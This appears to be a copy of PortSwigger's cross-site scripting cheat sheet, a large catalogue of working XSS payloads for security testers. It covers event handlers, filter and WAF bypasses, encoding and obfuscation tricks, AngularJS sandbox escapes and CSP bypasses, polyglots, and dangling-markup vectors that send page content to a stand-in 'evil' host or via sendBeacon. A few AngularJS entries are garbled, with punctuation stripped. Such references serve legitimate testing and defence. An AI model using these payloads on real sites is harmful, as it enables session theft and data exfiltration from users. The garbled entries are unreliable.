This cheat sheet wouldn't be possible without the web security community who share their research. Big thanks to James Kettle, Mario Heiderich, Eduardo Vela, Masato Kinugawa, Filedescriptor, LeverOne, Ben Hayak, Alex Inführ, Mathias Karlsson, Jan Horn, Ian Hickey, Gábor Molnár, tsetnep, Psych0tr1a, Skyphire, Abdulrhman Alqabandi, brainpillow, Kyo, Yosuke Hasegawa, White Jordan, Algol, jackmasa, wpulog, Bolk, Robert Hansen, David Lindsay, Superhei, Michal Zalewski, Renaud Lifchitz, Roman Ivanov, Frederik Braun, Krzysztof Kotowicz, Giorgio Maone, GreyMagic, Marcus Niemietz, Soroush Dalili, Stefano Di Paola, Roman Shafigullin, Lewis Ardern, Michał Bentkowski, SØᴘᴀS, avanish46, Juuso Käenmäki, jinmo123, itszn13, Martin Bajanik, David Granqvist, Andrea (theMiddle) Menin, simps0n, hahwul, Paweł Hałdrzyński, Jun Kokatsu, RenwaX23, sratarun, har1sec, Yann C, gadhiyasavan, p4fg, diofeher

You can contribute to this cheat sheet by creating a new issue or updating the JSON and creating a pull request.


onscroll Fires when the page scrolls <body onscroll=alert(1)><div style=height:1000px></div><div id=x></div> Compatibility:

onstart Fires when the marquee starts <marquee onstart=alert(1)>XSS</marquee> Compatibility:

ontimeupdate Fires when the timeline is changed <audio controls autoplay ontimeupdate=alert(1)><source src="validaudio.wav" type="audio/wav"></audio> Compatibility:

ontoggle Fires when the details tag is expanded <details ontoggle=alert(1) open>test</details> Compatibility:

ontransitioncancel Fires when a CSS transition cancels <style>:target {color: red;}</style><xss id=x style="transition:color 10s" ontransitioncancel=alert(1)></xss> Compatibility:

ontransitionend Fires when a CSS transition ends <style>:target {color:red;}</style><xss id=x style="transition:color 1s" ontransitionend=alert(1)></xss> Compatibility:

ontransitionrun Fires when a CSS transition begins <style>:target {transform: rotate(180deg);}</style><xss id=x style="transition:transform 2s" ontransitionrun=alert(1)></xss> Compatibility:

ontransitionstart Fires when a CSS transition starts <style>:target {color:red;}</style><xss id=x style="transition:color 1s" ontransitionstart=alert(1)></xss> Compatibility:

onunhandledrejection Fires when a promise isn't handled <body onunhandledrejection=alert(1)><script>fetch('//xyz')</script> Compatibility:

onunload Fires when the page is unloaded <body onunload=navigator.sendBeacon('//https://ssl.portswigger-labs.net/',document.body.innerHTML)> Compatibility:

onwaiting Fires while waiting for the data <video autoplay controls onwaiting=alert(1)><source src="validvideo.mp4" type="video/mp4"></video> Compatibility:

onwebkitanimationend Fires when a CSS animation ends <style>@keyframes x{}</style><xss style="animation-name:x" onwebkitanimationend="alert(1)"></xss> Compatibility:

onwebkitanimationiteration Fires when a CSS animation repeats <style>@keyframes slidein {}</style><xss style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onwebkitanimationiteration="alert(1)"></xss> Compatibility:

onwebkitanimationstart Fires when a CSS animation starts <style>@keyframes x{}</style><xss style="animation-name:x" onwebkitanimationstart="alert(1)"></xss> Compatibility:

onwebkittransitionend Fires when a CSS transition ends <style>:target {color:red;}</style><xss id=x style="transition:color 1s" onwebkittransitionend=alert(1)></xss> Compatibility:

Event handlers that do require user interaction

Event Description Code

onauxclick Fires when right clicking or using the middle button of the mouse <input onauxclick=alert(1)> Compatibility:

onbeforecopy Requires you to copy a piece of text <a onbeforecopy=alert(1) contenteditable>test</a> Compatibility:

onbeforecut Requires you to cut a piece of text <a onbeforecut=alert(1) contenteditable>test</a> Compatibility:

onbeforepaste Requires you to paste a piece of text <a onbeforepaste=alert(1) contenteditable>test</a> Compatibility:

onchange Requires a change of value <input onchange=alert(1) value=xss> Compatibility:

onclick Requires a click of the element <xss onclick=alert(1)>test</xss> Compatibility:

onclose Fires when a dialog is closed <dialog open onclose=alert(1)><form method=dialog><button>XSS</button></form> Compatibility:

oncontextmenu Triggered when right clicking to show the context menu <xss oncontextmenu=alert(1)>test</xss> Compatibility:

oncopy Requires you to copy a piece of text <xss oncopy=alert(1) value=XSS autofocus tabindex=1>test Compatibility:

oncut Requires you to cut a piece of text <xss oncut=alert(1) value=XSS autofocus tabindex=1>test Compatibility:

ondblclick Triggered when double clicking the element <xss ondblclick=alert(1) autofocus tabindex=1>test</xss> Compatibility:

ondrag Triggered when dragging the element <xss draggable=true ondrag=alert(1)>test</xss> Compatibility:

ondragend Triggered when dragging of the element is finished <xss draggable=true ondragend=alert(1)>test</xss> Compatibility:

ondragenter Requires a mouse drag <xss draggable=true ondragenter=alert(1)>test</xss> Compatibility:

ondragleave Requires a mouse drag <xss draggable=true ondragleave=alert(1)>test</xss> Compatibility:

ondragover Triggered when dragging over an element <div draggable=true contenteditable>drag me</div><xss ondragover=alert(1) contenteditable>drop here</xss> Compatibility:

ondragstart Requires a mouse drag <xss draggable=true ondragstart=alert(1)>test</xss> Compatibility:

ondrop Triggered when dropping a draggable element <div draggable=true contenteditable>drag me</div><xss ondrop=alert(1) contenteditable>drop here</xss> Compatibility:

onfullscreenchange Fires when a video changes full screen status <video onfullscreenchange=alert(1) src=validvideo.mp4 controls> Compatibility:

oninput Requires a change of value <input oninput=alert(1) value=xss> Compatibility:

oninvalid Requires a form submission with an element that does not satisfy its constraints, such as a required attribute <form><input oninvalid=alert(1) required><input type=submit> Compatibility:

onkeydown Triggered when a key is pressed <xss onkeydown=alert(1) contenteditable>test</xss> Compatibility:

onkeypress Triggered when a key is pressed <xss onkeypress=alert(1) contenteditable>test</xss> Compatibility:

onkeyup Triggered when a key is released <xss onkeyup=alert(1) contenteditable>test</xss> Compatibility:

onmousedown Triggered when the mouse is pressed <xss onmousedown=alert(1)>test</xss> Compatibility:

onmouseenter Triggered when the mouse is hovered over the element <xss onmouseenter=alert(1)>test</xss> Compatibility:

onmouseleave Triggered when the mouse is moved away from the element <xss onmouseleave=alert(1)>test</xss> Compatibility:

onmousemove Requires mouse movement <xss onmousemove=alert(1)>test</xss> Compatibility:

onmouseout Triggered when the mouse is moved away from the element <xss onmouseout=alert(1)>test</xss> Compatibility:

onmouseover Requires a hover over the element <xss onmouseover=alert(1)>test</xss> Compatibility:

onmouseup Triggered when the mouse button is released <xss onmouseup=alert(1)>test</xss> Compatibility:

onmousewheel Fires when the mousewheel scrolls <xss onmousewheel=alert(1)>requires scrolling Compatibility:

onmozfullscreenchange Fires when a video changes full screen status <video onmozfullscreenchange=alert(1) src=validvideo.mp4 controls> Compatibility:

onpagehide Fires when the page is changed <body onpagehide=navigator.sendBeacon('//https://ssl.portswigger-labs.net/',document.body.innerHTML)> Compatibility:

onpaste Requires you to paste a piece of text <a onpaste=alert(1) contenteditable>test</a> Compatibility:

onpause Requires clicking the element to pause <audio autoplay controls onpause=alert(1)><source src="validaudio.wav" type="audio/wav"></audio> Compatibility:

onpointerdown Fires on mouse down <xss onpointerdown=alert(1)>XSS</xss> Compatibility:

onpointerenter Fires on mouse enter <xss onpointerenter=alert(1)>XSS</xss> Compatibility:

onpointerleave Fires on mouse leave <xss onpointerleave=alert(1)>XSS</xss> Compatibility:

onpointermove Fires on mouse move <xss onpointermove=alert(1)>XSS</xss> Compatibility:

onpointerout Fires on mouse out <xss onpointerout=alert(1)>XSS</xss> Compatibility:

onpointerover Fires on mouse over <xss onpointerover=alert(1)>XSS</xss> Compatibility:

onpointerrawupdate Fires when the pointer changes <xss onpointerrawupdate=alert(1)>XSS</xss> Compatibility:

onpointerup Fires on mouse up <xss onpointerup=alert(1)>XSS</xss> Compatibility:

onreset Requires a click <form onreset=alert(1)><input type=reset> Compatibility:

onsearch Fires when a form is submitted and the input has a type attribute of search <form><input type=search onsearch=alert(1) value="Hit return" autofocus> Compatibility:

onseeked Requires clicking the element timeline <audio autoplay controls onseeked=alert(1)><source src="validaudio.wav" type="audio/wav"></audio> Compatibility:

onseeking Requires clicking the element timeline <audio autoplay controls onseeking=alert(1)><source src="validaudio.wav" type="audio/wav"></audio> Compatibility:

onselect Requires you to select text <input onselect=alert(1) value=XSS autofocus> Compatibility:

onselectionchange Fires when the text selection is changed on the page <body onselectionchange=alert(1)>select some text Compatibility:

onselectstart Fires when beginning a text selection <body onselectstart=alert(1)>select some text Compatibility:

onshow Fires when the context menu is shown <div contextmenu=xss><p>Right click<menu type=context id=xss onshow=alert(1)></menu></div> Compatibility:

onsubmit Requires a form submission <form onsubmit=alert(1)><input type=submit> Compatibility:

ontouchend Fires on the touch screen (mobile devices only) <body ontouchend=alert(1)> Compatibility:

ontouchmove Fires on the touch screen when moving (mobile devices only) <body ontouchmove=alert(1)> Compatibility:

ontouchstart Fires on the touch screen (mobile devices only) <body ontouchstart=alert(1)> Compatibility:

onvolumechange Requires volume adjustment <audio autoplay controls onvolumechange=alert(1)><source src="validaudio.wav" type="audio/wav"></audio> Compatibility:

onwheel Fires when you use the mouse wheel <body onwheel=alert(1)> Compatibility:

Restricted characters

No parentheses using exception handling <script>onerror=alert;throw 1</script>

No parentheses using exception handling, no semicolons <script>{onerror=alert}throw 1</script>

No parentheses using exception handling, no semicolons, using expressions <script>throw onerror=alert,1</script>

No parentheses using exception handling and eval <script>throw onerror=eval,'=alert\x281\x29'</script>

No parentheses using exception handling and eval on Firefox <script>onerror=eval;throw{lineNumber:1,columnNumber:1,fileName:1,message:'alert\x281\x29'}</script>

No parentheses using ES6 hasInstance and instanceof with eval <script>'alert\x281\x29'instanceof{[Symbol.hasInstance]:eval}</script>

No parentheses using ES6 hasInstance and instanceof with eval, without . <script>'alert\x281\x29'instanceof{[Symbol['hasInstance']]:eval}</script>

No parentheses using location redirect <script>location='javascript:alert\x281\x29'</script>

No parentheses using location redirect, no strings <script>location=name</script>

No parentheses using template strings <script>alert`1`</script>

No parentheses using template strings and location hash <script>new Function`X${document.location.hash.substr`1`}`</script>

No parentheses or spaces using template strings and location hash <script>Function`X${document.location.hash.substr`1`}```</script>

Frameworks

Bootstrap onanimationstart event <xss class=progress-bar-animated onanimationstart=alert(1)>

Bootstrap ontransitionend event <xss class="carousel slide" data-ride=carousel data-interval=100 ontransitionend=alert(1)><xss class=carousel-inner><xss class="carousel-item active"></xss><xss class=carousel-item></xss></xss></xss>

Protocols

Iframe src attribute JavaScript protocol <iframe src=javascript:alert(1)>

Object data attribute with JavaScript protocol <object data=javascript:alert(1)>

Embed src attribute with JavaScript protocol <embed src=javascript:alert(1)>

A standard JavaScript protocol <a href=javascript:alert(1)>XSS</a>

The protocol is not case sensitive <a href=JaVaScript:alert(1)>XSS</a>

Characters \x01-\x20 are allowed before the protocol <a href=" javascript:alert(1)">XSS</a>

Characters \x09, \x0a, \x0d are allowed inside the protocol (the example uses a tab) <a href="javas	cript:alert(1)">XSS</a>

Characters \x09, \x0a, \x0d are allowed after the protocol name, before the colon (the example uses a tab) <a href="javascript	:alert(1)">XSS</a>

Xlink namespace inside SVG with JavaScript protocol <svg><a xlink:href=javascript:alert(1)><text x=20 y=20>XSS</text></a>

SVG animate tag using values <svg><animate xlink:href=#xss attributeName=href values=javascript:alert(1) /><a id=xss><text x=20 y=20>XSS</text></a>

SVG animate tag using to <svg><animate xlink:href=#xss attributeName=href from=javascript:alert(1) to=1 /><a id=xss><text x=20 y=20>XSS</text></a>


SVG set tag <svg><set xlink:href=#xss attributeName=href from=? to=javascript:alert(1) /><a id=xss><text x=20 y=20>XSS</text></a>

Data protocol inside script src <script src="data:text/javascript,alert(1)"></script>

SVG script href attribute without closing script tag <svg><script href="data:text/javascript,alert(1)" />

SVG use element (Chrome/Firefox) <svg><use href="data:image/svg+xml,<svg id='x' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' width='100' height='100'><a xlink:href='javascript:alert(1)'><rect x='0' y='0' width='100' height='100' /></a></svg>#x"></use></svg>

Import statement with data URL <script>import('data:text/javascript,alert(1)')</script>

Base tag with JavaScript protocol rewriting relative URLs

<base href="javascript:/a/-alert(1)///////"><a href=../lol/safari.html>test</a>

MathML makes any tag clickable <math><x href="javascript:alert(1)">blah

Button and formaction <form><button formaction=javascript:alert(1)>XSS

Input and formaction <form><input type=submit formaction=javascript:alert(1) value=XSS>

Form and action <form action=javascript:alert(1)><input type=submit value=XSS>

Use element with an external URL <svg><use href="//subdomain1.portswigger-labs.net/use_element/upload.php#x" /></svg>

Animate tag with keytimes and multiple values <svg><animate xlink:href=#xss attributeName=href dur=5s repeatCount=indefinite keytimes=0;0;1 values="https://portswigger.net?&semi;javascript:alert(1)&semi;0" /><a id=xss><text x=20 y=20>XSS</text></a>

Other useful attributes

Using srcdoc attribute <iframe srcdoc="<img src=1 onerror=alert(1)>"></iframe>

Using srcdoc with entities <iframe srcdoc="&lt;img src=1 onerror=alert(1)&gt;"></iframe>

Click a submit element from anywhere on the page, even outside the form

<form action=javascript:alert(1)><input type=submit id=x></form><label for=x>XSS</label>

Hidden inputs: accesskey attributes can enable XSS on normally unexploitable elements

<input type=hidden accesskey=X onclick=alert(1)> (Press ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X)

Link elements: accesskey attributes can enable XSS on normally unexploitable elements

<link rel=canonical accesskey=X onclick=alert(1) /> (Press ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X)

Download attribute can save a copy of the current webpage

<a href="" download="filename.html">Test</a>

Disable referrer using referrerpolicy <img referrerpolicy="no-referrer" src="//portswigger-labs.net">

Set window.name via parameter on the window.open function

<a href="" onclick='window.open("http://subdomain1.portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name);//","alert(1)")'>XSS</a>

Set window.name via name attribute in an <iframe> tag <iframe name="alert(1)" src="https://portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name);//"></iframe>

Set window.name via target attribute in a <base> tag <base target="alert(1)"><a href="http://subdomain1.portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name);//">XSS via target in base tag</a>

Set window.name via target attribute in an <a> tag <a target="alert(1)" href="http://subdomain1.portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name);//">XSS via target in a tag</a>

Set window.name via usemap attribute in an <img> tag

<img src=validimage.png width=10 height=10 usemap=#xss><map name=xss><area shape=rect coords=0,0,82,126 target="alert(1)" href="http://subdomain1.portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name);//"></map>

Set window.name via target attribute in a <form> tag <form action="http://subdomain1.portswigger-labs.net/xss/xss.php" target="alert(1)"><input type=hidden name=x value="%27;eval(name);//"><input type=hidden name=context value=js_string_single><input type=submit value="XSS via target in a form"></form>

Set window.name via formtarget attribute in an <input> tag, type submit

<form><input type=hidden name=x value="%27;eval(name);//"><input type=hidden name=context value=js_string_single><input type=submit formaction="http://subdomain1.portswigger-labs.net/xss/xss.php" formtarget="alert(1)" value="XSS via formtarget in input type submit"></form>

Set window.name via formtarget attribute in an <input> tag, type image

<form><input type=hidden name=x value="%27;eval(name);//"><input type=hidden name=context value=js_string_single><input name=1 type=image src=validimage.png formaction="http://subdomain1.portswigger-labs.net/xss/xss.php" formtarget="alert(1)" value="XSS via formtarget in input type image"></form>

Special tags

Redirect to a different domain: <meta http-equiv="refresh" content="0; url=//portswigger-labs.net">

Meta charset attribute UTF-7: <meta charset="UTF-7" /> +ADw-script+AD4-alert(1)+ADw-/script+AD4-

Meta charset UTF-7: <meta http-equiv="Content-Type" content="text/html; charset=UTF-7" /> +ADw-script+AD4-alert(1)+ADw-/script+AD4-

UTF-7 BOM characters (has to be at the start of the document) 1:

+/v8 +ADw-script+AD4-alert(1)+ADw-/script+AD4-

UTF-7 BOM characters (has to be at the start of the document) 2:

+/v9 +ADw-script+AD4-alert(1)+ADw-/script+AD4-

UTF-7 BOM characters (has to be at the start of the document) 3:

+/v+ +ADw-script+AD4-alert(1)+ADw-/script+AD4-

UTF-7 BOM characters (has to be at the start of the document) 4:

+/v/ +ADw-script+AD4-alert(1)+ADw-/script+AD4-

Upgrade insecure requests: <meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests">

Disable JavaScript via iframe sandbox: <iframe sandbox src="//portswigger-labs.net"></iframe>

Disable referrer: <meta name="referrer" content="no-referrer">

Encoding

Overlong UTF-8 (the leading < is sent as an overlong encoding of 0x3C): %C0%BCscript>alert(1)</script> %E0%80%BCscript>alert(1)</script> %F0%80%80%BCscript>alert(1)</script> %F8%80%80%80%BCscript>alert(1)</script> %FC%80%80%80%80%BCscript>alert(1)</script>

Unicode escapes: <script>\u0061lert(1)</script>

Unicode escapes ES6 style: <script>\u{61}lert(1)</script>

Unicode escapes ES6 style zero padded: <script>\u{0000000061}lert(1)</script>

Hex encoding JavaScript escapes: <script>eval('\x61lert(1)')</script>

Octal encoding: <script>eval('\141lert(1)')</script> <script>eval('alert(\061)')</script> <script>eval('alert(\61)')</script>

Decimal encoding with optional semi-colon: <a href="&#106avascript:alert(1)">XSS</a> <a href="&#106;avascript:alert(1)">XSS</a>

SVG script with HTML encoding: <svg><script>&#97;lert(1)</script></svg> <svg><script>&#x61;lert(1)</script></svg> <svg><script>alert&NewLine;(1)</script></svg> <svg><script>x="&quot;,alert(1)//";</script></svg>

Decimal encoding with padded zeros: <a href="&#0000106avascript:alert(1)">XSS</a>

Hex encoding entities: <a href="&#x6a;avascript:alert(1)">XSS</a>

Hex encoding without semi-colon, provided the next character is not a-f0-9:

<a href="j&#x61vascript:alert(1)">XSS</a> <a href="&#x6a avascript:alert(1)">XSS</a> <a href="&#x6a avascript:alert(1)">XSS</a>

Hex encoding with padded zeros: <a href="&#x0000006a;avascript:alert(1)">XSS</a>

Hex encoding is not case sensitive: <a href="&#X6A;avascript:alert(1)">XSS</a>

HTML entities: <a href="javascript&colon;alert(1)">XSS</a> <a href="java&Tab;script:alert(1)">XSS</a> <a href="java&NewLine;script:alert(1)">XSS</a> <a href="javascript&colon;alert&lpar;1&rpar;">XSS</a>

URL encoding: <a href="javascript:x='%27-alert(1)-%27'">XSS</a>

HTML entities and URL encoding: <a href="javascript:x='&percnt;27-alert(1)-%27'">XSS</a>

Obfuscation

Data protocol inside script src with base64: <script src="data:text/javascript;base64,YWxlcnQoMSk="></script>

Data protocol inside script src with base64 and HTML entities:

<script src="data:text/javascript;base64,&#x59;&#x57;&#x78;&#x6c;&#x63;&#x6e;&#x51;&#x6f;&#x4d;&#x53;&#x6b;&#x3d;"></script>

Data protocol inside script src with base64 and URL encoding:

<script src="data:text/javascript;base64,%59%57%78%6c%63%6e%51%6f%4d%53%6b%3d"></script>

Iframe srcdoc HTML encoded: <iframe srcdoc="&lt;script&gt;alert&lpar;1&rpar;&lt;&sol;script&gt;"></iframe>

Iframe JavaScript URL with HTML and URL encoding: <iframe src="javascript:&#x25;&#x33;&#x43;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x25;&#x33;&#x45;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;&#x25;&#x33;&#x43;&#x25;&#x32;&#x46;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x25;&#x33;&#x45;"></iframe>

SVG script with unicode escapes and HTML encoding:

<svg><script>&#x5c;&#x75;&#x30;&#x30;&#x36;&#x31;&#x5c;&#x75;&#x30;&#x30;&#x36;&#x63;&#x5c;&#x75;&#x30;&#x30;&#x36;&#x35;&#x5c;&#x75;&#x30;&#x30;&#x37;&#x32;&#x5c;&#x75;&#x30;&#x30;&#x37;&#x34;(1)</script></svg>

Client-side template injection

VueJS reflected

Version, Author, Length: Vector

All versions, Mario Heiderich (Cure53), 41: {{constructor.constructor('alert(1)')()}}

All versions, Mario Heiderich (Cure53) & Sebastian Lekies (Google), Eduardo Vela Nava (Google), Krzysztof Kotowicz (Google), 62: <div v-html="''.constructor.constructor('alert(1)')()">a</div>

All versions, Gareth Heyes (PortSwigger), 39: <x v-html=_c.constructor('alert(1)')()>

All versions, Peter af Geijerstam (Swedish Shellcode Factory), 37: <x v-if=_c.constructor('alert(1)')()>

AngularJS sandbox escapes reflected

Version, Author, Length: Vector

1.0.1 - 1.1.5, Mario Heiderich (Cure53), 41: {{constructor.constructor('alert(1)')()}}

1.0.1 - 1.1.5 (shorter), Gareth Heyes (PortSwigger) & Lewis Ardern (Synopsys), 33: {{$on.constructor('alert(1)')()}}

1.2.0 - 1.2.1, Jan Horn (Google), 122: {{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}

1.2.2 - 1.2.5, Gareth Heyes (PortSwigger), 23: {{{}.")));alert(1)//"}}

1.2.6 - 1.2.18, Jan Horn (Google), 106: {{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}}

1.2.19 - 1.2.23, Mathias Karlsson (Detectify), 124: {{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor);}}

1.2.24 - 1.2.29, Gareth Heyes (PortSwigger), 23: {{{}.")));alert(1)//"}}

1.2.7 - 1.2.9, 1.3.0 - 1.3.20, Gareth Heyes (PortSwigger), 23: {{{}.")));alert(1)//"}}

130 Gaacutebor Molnaacuter (Google) 272 ready ampamp (ready = true) ampamp ( call $$watchers[0]get(toStringconstructorprototype) (a = apply) ampamp (apply = constructor) ampamp (valueOf = call) ampamp (+toString( F = Functionprototype + Fapply = Fa + delete Fa + delete FvalueOf + alert(1) )))

1.3.3 - 1.3.18, Gareth Heyes (PortSwigger), 128: {{'a'[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)//');}}

1.3.19, Gareth Heyes (PortSwigger), 102: {{'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=[].join;$eval('x=alert(1)//');}}

1.3.20, Gareth Heyes (PortSwigger), 65: {{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}

1.4.0 - 1.4.9, Gareth Heyes (PortSwigger), 74: {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}

1.5.0 - 1.5.8, Ian Hickey & Gareth Heyes (PortSwigger), 79: {{x={'y':''.constructor.prototype};x['y'].charAt=[].join;$eval('x=alert(1)');}}

159 - 1511 Jan Horn (Google) 517 c=subcallb=subbinda=subapply c$apply=$applyc$eval=bop=$root$$phase $root$$phase=nullod=$root$digest$root$digest=()toString C=c$apply(c)$root$$phase=op$root$digest=od B=C(bcb)$evalAsync( astNode=pop()astNodetype=UnaryExpression astNodeoperator=(windowXvoid0(windowX=truealert(1)))+ astNodeargument=typeIdentifiernamefoo ) m1=B($$asyncQueuepop()expressionnull$root) m2=B(Cnullm1)[]pushapply=m2a=sub $eval(a(bc))[]pushapply=a

>=1.6.0, Mario Heiderich (Cure53), 41: {{constructor.constructor('alert(1)')()}}

>=1.6.0 (shorter), Gareth Heyes (PortSwigger) & Lewis Ardern (Synopsys), 33: {{$on.constructor('alert(1)')()}}

DOM based AngularJS sandbox escapes (Using orderBy or no $eval)

Version, Author, Length: Vector

1.0.1 - 1.1.5, Mario Heiderich (Cure53), 37: constructor.constructor('alert(1)')()

1.2.0 - 1.2.18, Jan Horn (Google), 118: a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()

1.2.19 - 1.2.23, Mathias Karlsson (Detectify), 119: toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor)

1224 - 1226 Gareth Heyes (PortSwigger) 317 [[__proto__]][x]=constructorgetOwnPropertyDescriptorg=[[__proto__]][x][[__proto__]][y]=g(sub[[__proto__]]constructor)[[__proto__]][z]=constructordefinePropertyd=[[__proto__]][z]d(sub[[__proto__]]constructorvaluefalse)[[__proto__]][y]value(alert(1))()

1.2.7 - 1.2.9, 1.3.0 - 1.3.20, Gareth Heyes (PortSwigger), 20: {}.")));alert(1)//"

1.4.0 - 1.4.5, Gareth Heyes (PortSwigger), 75: 'a'.constructor.prototype.charAt=[].join;[1]|orderBy:'x=1} } };alert(1)//';

>=1.6.0, Mario Heiderich (Cure53), 37: constructor.constructor('alert(1)')()

1.4.4 (without strings), Gareth Heyes (PortSwigger), 134: toString().constructor.prototype.charAt=[].join; [1,2]|orderBy:toString().constructor.fromCharCode(120,61,97,108,101,114,116,40,49,41)

AngularJS CSP bypasses

Version, Author, Length: Vector

All versions (Chrome), Gareth Heyes (PortSwigger), 81: <input autofocus ng-focus="$event.path|orderBy:'[].constructor.from([1],alert)'">

All versions (Chrome) shorter, Gareth Heyes (PortSwigger), 56: <input id=x ng-focus=$event.path|orderBy:'(z=alert)(1)'>

All versions (all browsers) shorter, Gareth Heyes (PortSwigger), 91: <input autofocus ng-focus="$event.composedPath()|orderBy:'[].constructor.from([1],alert)'">

1.2.0 - 1.5.0, Eduardo Vela (Google), 190: <div ng-app ng-csp><div ng-focus="x=$event" id=f tabindex=0>foo</div><div ng-repeat="(key, value) in x.view"><div ng-if="key == 'window'">{{ [1].reduce(value.alert, 1); }}</div></div></div>

All versions (Chrome) shorter via oncut, Savan Gadhiya (NotSoSecure), 49: <input ng-cut=$event.path|orderBy:'(y=alert)(1)'>

Scriptless attacks

Dangling markup

Background attribute (each of the following is an unterminated attribute that swallows the markup after it):
<body background="//evil?
<table background="//evil?
<table><thead background="//evil?
<table><tbody background="//evil?
<table><tfoot background="//evil?
<table><td background="//evil?
<table><th background="//evil?

Link href stylesheet: <link rel=stylesheet href="//evil?

Link href icon: <link rel=icon href="//evil?

Meta refresh: <meta http-equiv="refresh" content="0; http://evil?

Img to pass markup through src attribute: <img src="//evil?  and  <image src="//evil?

Video using track element: <video><track default src="//evil?

Video using source element and src attribute: <video><source src="//evil?

Audio using source element and src attribute: <audio><source src="//evil?

Input src: <input type=image src="//evil?

Button using formaction: <form><button style="width:100%;height:100%" type=submit formaction="//evil?

Input using formaction: <form><input type=submit value="XSS" style="width:100%;height:100%" type=submit formaction="//evil?

Form using action: <button form=x style="width:100%;height:100%;"><form id=x action="//evil?

Object data: <object data="//evil?

Iframe src: <iframe src="//evil?

Embed src: <embed src="//evil?

Embed src ltembed src evil

Use textarea to consume markup and post to an external site:

<form><button formaction=//evil>XSS</button><textarea name=x>

Pass markup data through window.name using form target:

<button form=x>XSS</button><form id=x action=//evil target='

Pass markup data through window.name using base target:

<a href=http://subdomain1.portswigger-labs.net/dangling_markup/name.html><font size=100 color=red>You must click me</font></a><base target="

Pass markup data through window.name using formtarget:

<form><input type=submit value="Click me" formaction=http://subdomain1.portswigger-labs.net/dangling_markup/name.html formtarget="

Using base href to pass data: <a href=abc style="width:100%;height:100%;position:absolute;font-size:1000px;">xss</a><base href="//evil/

Using embed window name to pass data from the page:

<embed src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="

Using iframe window name to pass data from the page:

<iframe src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="

Using object window name to pass data from the page:

<object data=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="

Using frame window name to pass data from the page:

<frameset><frame src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="

Overwrite type attribute with image in hidden inputs: <input type=hidden type=image src="//evil?

Polyglots

Polyglot payload 1: javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>

Polyglot payload 2: javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>

Polyglot payload 3: javascript:/*--></title></style></textarea></script></xmp><details/open/ontoggle='+/`/+/"/+/onmouseover=1/+/[*/[]/+alert(/@PortSwiggerRes/)//'>

WAF bypass global objects

XSS into a JavaScript string, string concatenation (window): window['ale'+'rt'](window['doc'+'ument']['dom'+'ain'])

XSS into a JavaScript string, string concatenation (self): self['ale'+'rt'](self['doc'+'ument']['dom'+'ain'])

XSS into a JavaScript string, string concatenation (this): this['ale'+'rt'](this['doc'+'ument']['dom'+'ain'])

XSS into a JavaScript string, string concatenation (top): top['ale'+'rt'](top['doc'+'ument']['dom'+'ain'])

XSS into a JavaScript string, string concatenation (parent): parent['ale'+'rt'](parent['doc'+'ument']['dom'+'ain'])

XSS into a JavaScript string, string concatenation (frames): frames['ale'+'rt'](frames['doc'+'ument']['dom'+'ain'])

XSS into a JavaScript string, string concatenation (globalThis): globalThis['ale'+'rt'](globalThis['doc'+'ument']['dom'+'ain'])

XSS into a JavaScript string, comment syntax (window): window[/*foo*/'alert'/*bar*/](window[/*foo*/'document'/*bar*/]['domain'])

XSS into a JavaScript string, comment syntax (self): self[/*foo*/'alert'/*bar*/](self[/*foo*/'document'/*bar*/]['domain'])

XSS into a JavaScript string, comment syntax (this): this[/*foo*/'alert'/*bar*/](this[/*foo*/'document'/*bar*/]['domain'])

XSS into a JavaScript string, comment syntax (top): top[/*foo*/'alert'/*bar*/](top[/*foo*/'document'/*bar*/]['domain'])

XSS into a JavaScript string, comment syntax (parent): parent[/*foo*/'alert'/*bar*/](parent[/*foo*/'document'/*bar*/]['domain'])

XSS into a JavaScript string, comment syntax (frames): frames[/*foo*/'alert'/*bar*/](frames[/*foo*/'document'/*bar*/]['domain'])

XSS into a JavaScript string, comment syntax (globalThis): globalThis[/*foo*/'alert'/*bar*/](globalThis[/*foo*/'document'/*bar*/]['domain'])

XSS into a JavaScript string, hex escape sequence (window): window['\x61\x6c\x65\x72\x74'](window['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])

XSS into a JavaScript string, hex escape sequence (self): self['\x61\x6c\x65\x72\x74'](self['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])

